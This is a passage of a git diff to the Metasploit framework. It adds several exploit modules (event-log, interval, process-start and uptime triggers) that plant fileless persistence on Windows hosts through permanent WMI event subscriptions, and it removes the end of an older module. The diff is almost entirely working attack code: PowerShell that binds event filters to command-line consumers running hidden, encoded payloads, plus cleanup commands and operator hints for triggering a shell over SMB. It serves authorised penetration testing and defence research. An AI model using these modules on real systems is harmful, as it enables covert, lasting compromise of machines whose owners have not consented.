\"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_waitfor - command = build_payload - word = datastore['WAITFOR_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1} - Start-Process -FilePath waitfor.exe #{word} -NoNewWindow - HEREDOC - end - - def log_file - host = session.session_host - filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") - logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence', - Rex::FileUtils.clean_path(host + filenameinfo)) - ::FileUtils.mkdir_p(logs) - logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc') - end - - def remove_persistence - name_class = datastore['CLASSNAME'] - clean_rc = log_file - if datastore['PERSISTENCE_METHOD'] == "WAITFOR" - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - else - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - end - file_local_write(clean_rc, clean_up_rc) - print_status("Clean up Meterpreter RC file: #{clean_rc}") - end -end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb new file mode 100644 index 0000000000000..93e7ca8d6207b --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Event Log Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that will query the event log for an EVENT_ID_TRIGGER + (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing + must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon + /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptInt.new('EVENT_ID_TRIGGER', + [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]), + OptString.new('USERNAME_TRIGGER', + [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + host = session.session_host + print_status('Installing Persistence...') + + psh_exec(subscription_event) + print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U #{datastore['USERNAME_TRIGGER']} \"" + print_good ' or' + print_good 'use auxiliary/scanner/smb/smb_login' + print_good " run SMBUser=#{datastore['USERNAME_TRIGGER']} SMBPass= RHOSTS=#{host}" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_event + command = build_payload + event_id = datastore['EVENT_ID_TRIGGER'] + username = datastore['USERNAME_TRIGGER'] + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb new file mode 100644 index 0000000000000..a09ec2604efc6 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb @@ -0,0 +1,135 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Interval Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that triggers the payload after the specified CALLBACK_INTERVAL. + + If the persistence is not installed, it will keep triggering payloads to spawn. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptInt.new('CALLBACK_INTERVAL', + [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1_800_000 ]), # 30 minutes + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def format_duration(ms) + total_seconds = ms / 1000 + hours = total_seconds / 3600 + minutes = (total_seconds % 3600) / 60 + seconds = total_seconds % 60 + + parts = [] + parts << "#{hours}h" if hours > 0 + parts << "#{minutes}m" if minutes > 0 + parts << "#{seconds}s" if seconds > 0 || parts.empty? + + parts.join(' ') + end + + def install_persistence + print_status('Installing Persistence...') + psh_exec(subscription_interval) + print_good "Persistence installed! Callback should be in: #{format_duration(datastore['CALLBACK_INTERVAL'])}" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_interval + command = build_payload + class_name = datastore['CLASSNAME'] + callback_interval = datastore['CALLBACK_INTERVAL'] + <<-HEREDOC + $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"} + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb new file mode 100644 index 0000000000000..a6f52f2adbb6c --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb @@ -0,0 +1,117 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Process Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that triggers the payload when the specified process is started. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('PROCESS_TRIGGER', + [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + psh_exec(subscription_process) + print_good 'Persistence installed!' + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_process + command = build_payload + class_name = datastore['CLASSNAME'] + process_name = datastore['PROCESS_TRIGGER'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb new file mode 100644 index 0000000000000..c5a78a1fba847 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb @@ -0,0 +1,152 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Logon Timer Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that + will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]), + OptInt.new('SYSTEM_UPTIME_START', [true, 'System uptime to start the trigger (In seconds). (Default: 240).', 240 ]), # 4min + OptInt.new('SYSTEM_UPTIME_END', [true, 'System uptime to end the trigger (In seconds). (Default: 325).', 325 ]), # 5min 25sec + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + uptime = windows_uptime + vprint_status("System uptime: #{uptime}s") + return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) is less than the current system uptime: #{uptime}") if uptime > datastore['SYSTEM_UPTIME_START'] + return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) must be less than SYSTEM_UPTIME_END: #{datastore['SYSTEM_UPTIME_END']}") if datastore['SYSTEM_UPTIME_START'] > datastore['SYSTEM_UPTIME_END'] + + CheckCode::Appears('Likely exploitable') + end + + def windows_uptime + # Run PowerShell to get boot time in WMI format + boot_time_str = cmd_exec('powershell -Command "(gcim Win32_OperatingSystem).LastBootUpTime | Out-String"').strip + + # Try to parse PowerShell localized format (e.g. "Thursday, November 20, 2025 7:45:59 PM") + begin + boot_time = Time.parse(boot_time_str) + rescue ArgumentError + # Fallback: try WMI format like "20251120194559.500000-300" + if boot_time_str =~ /^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})\.\d+\s*([+-]\d{3})?/ + year = ::Regexp.last_match(1) + month = ::Regexp.last_match(2) + day = ::Regexp.last_match(3) + hour = ::Regexp.last_match(4) + min = ::Regexp.last_match(5) + sec = ::Regexp.last_match(6) + tz_offset = ::Regexp.last_match(7) + offset_hours = (tz_offset.to_i / 60) + offset = format('%+03d:00', offset_hours) + boot_time = Time.new(year, month, day, hour, min, sec, offset) + else + vprint_error("Unable to parse boot time: #{boot_time_str.inspect}") + return 0 + end + end + + (Time.now - boot_time).round + end + + def install_persistence + print_status('Installing Persistence...') + + psh_exec(subscription_logon) + print_good 'Persistence installed!' + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + 